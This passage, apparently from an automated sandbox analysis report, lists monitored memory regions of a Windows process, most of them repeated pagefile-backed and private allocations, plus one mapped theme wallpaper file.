0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10047 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10051 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10052 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10055 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10056 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10057 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10058 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10059 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10060 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10061 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10062 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10063 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10064 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10065 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10066 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10067 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10068 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10069 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10070 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10071 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10072 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10073 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10074 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10076 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10077 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10078 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10079 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10080 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10081 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10082 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10083 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10084 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10085 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10086 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10087 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10090 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10091 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10104 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10155 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10156 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10157 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10158 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10201 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 10202 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10203 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10207 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10208 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10209 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10210 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10211 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10225 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 10226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10230 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = 